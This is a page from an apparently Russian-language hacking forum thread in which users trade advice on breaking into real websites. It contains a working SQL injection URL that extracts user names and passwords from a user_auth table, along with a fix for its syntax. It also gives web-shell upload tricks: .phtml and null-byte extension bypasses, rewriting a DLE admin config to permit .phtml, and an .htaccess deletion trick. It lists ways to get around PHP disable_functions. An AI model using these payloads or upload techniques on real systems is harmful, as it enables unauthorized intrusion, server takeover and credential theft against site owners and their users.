Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    Не работает MySQL??
    _http://club-lexus.ru/faq/index.php?series_id=99999999
     
  2. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    Could not connect to the database какбэ намекает.
    http://bit.ly/sUlGX8
     
    1 person likes this.
  3. DyukiN

    DyukiN Banned

    Joined:
    10 Jul 2011
    Messages:
    253
    Likes Received:
    46
    Reputations:
    21
    как залить шелл на website baker?
     
  4. tabletkO

    tabletkO Banned

    Joined:
    3 Nov 2011
    Messages:
    83
    Likes Received:
    20
    Reputations:
    11
    Залей в формате *.phtml, на демке, в офф сайте пашет :D
    http://demo.opensourcecms.com/websitebaker/media/file.phtml
    phpinfo();
     
  5. DyukiN

    DyukiN Banned

    Joined:
    10 Jul 2011
    Messages:
    253
    Likes Received:
    46
    Reputations:
    21
    я заливаю его через лоад языка, вроде все норм грузиться, но когда начинаю пользоваться шеллом то выкидывает на страницу загрузки языка((
     
  6. tabletkO

    tabletkO Banned

    Joined:
    3 Nov 2011
    Messages:
    83
    Likes Received:
    20
    Reputations:
    11
    http://forum.antichat.ru/showpost.php?p=2888541&postcount=477
     
  7. Einstein

    Einstein New Member

    Joined:
    24 Oct 2011
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Помогите плз!
    нашел в базе таблицы:
    user_auth
    emails
    clients

    при попытке вывести данные из user_auth , вылетает ошибка
    www.xxx.xx/text.php?content_id=-4+union+select+UNHEX(HEX(concat_ws(char(58),user_name,user_password))+from+user_auth+limit+0,1--

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from user_auth limit 0,1--' at line 1

    а из других таблиц все нормально выводится

    в чем может быть проблема?????
     
  8. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Code:
    www.xxx.xx/text.php?content_id=-4+union+select+UNHEX(HEX(concat_ws(char(58),user_name,user_password[B])[/B]))+from+user_auth+limit+0,1--+
    скобку пропустил
     
    _________________________
  9. SergioBlog

    SergioBlog New Member

    Joined:
    21 Jan 2011
    Messages:
    10
    Likes Received:
    2
    Reputations:
    0
    Если отрублены функции exec,passthru,popen,proc_open,shell_exec,system,pcntl_exec есть другие варианты?)))
     
  10. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    perl, python, ssi, disable_functions bypass
     
    _________________________
  11. Einstein

    Einstein New Member

    Joined:
    24 Oct 2011
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    вставил не помогает =(
     
  12. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    Хочу залить шелл через баннер / картинку...
    Побываю так shell.php%00.gif shell.php.gif если просто shell.php то режет...Локального инклуда нет
    Есть ещё варианты?
     
  13. tabletkO

    tabletkO Banned

    Joined:
    3 Nov 2011
    Messages:
    83
    Likes Received:
    20
    Reputations:
    11
    Einstein,
    HTML:
    www.xxx.xx/text.php?content_id=-4+union+select+UNHEX(HEX(concat(user_name,char(58),user_password)))+from+0x757365725f61757468+limit+0,1--+[/HTML
    [B]aydin-ka[/B],
    Название CMS? Попробуй старый добрый *.phtml.
     
    #18253 tabletkO, 6 Nov 2011
    Last edited: 6 Nov 2011
    1 person likes this.
  14. -=Sinner=-

    -=Sinner=- Member

    Joined:
    17 Jan 2009
    Messages:
    42
    Likes Received:
    5
    Reputations:
    0
    иметься доступ в админ ку DLE V8.2 требуется залить шелл через админ ку как это сделать ?
     
  15. tabletkO

    tabletkO Banned

    Joined:
    3 Nov 2011
    Messages:
    83
    Likes Received:
    20
    Reputations:
    11
    -=Sinner=-,
    через "Настройки системы" пиши в config! Сделай разрешенным тип файла *.phtml и залей прямо с http://site/engine/images.php и т.д.
     
  16. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    прийдется помудрить с разрешенными раширениями.сначала залей .htaccess потом удаляй его..из за баги удалится оригинальный файл потом уже файл нужный
     
    #18256 Gorev, 6 Nov 2011
    Last edited: 6 Nov 2011
  17. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    и часто ты так заливал? и у тебя шелл работал?
     
  18. -=Sinner=-

    -=Sinner=- Member

    Joined:
    17 Jan 2009
    Messages:
    42
    Likes Received:
    5
    Reputations:
    0
    Разрешения загружаемых файлов dzmvdq,pdf,htaccess,php,zip,rar,phtml,doc,exe
    так же доступна загрузка изображений с самой админки может это как то облегчит заливку шелла ?
     
    #18258 -=Sinner=-, 6 Nov 2011
    Last edited: 6 Nov 2011
  19. tabletkO

    tabletkO Banned

    Joined:
    3 Nov 2011
    Messages:
    83
    Likes Received:
    20
    Reputations:
    11
    Gorev,
    да работал, но конечно сначала удалил .htaccess...
     
  20. Einstein

    Einstein New Member

    Joined:
    24 Oct 2011
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
     
Thread Status:
Not open for further replies.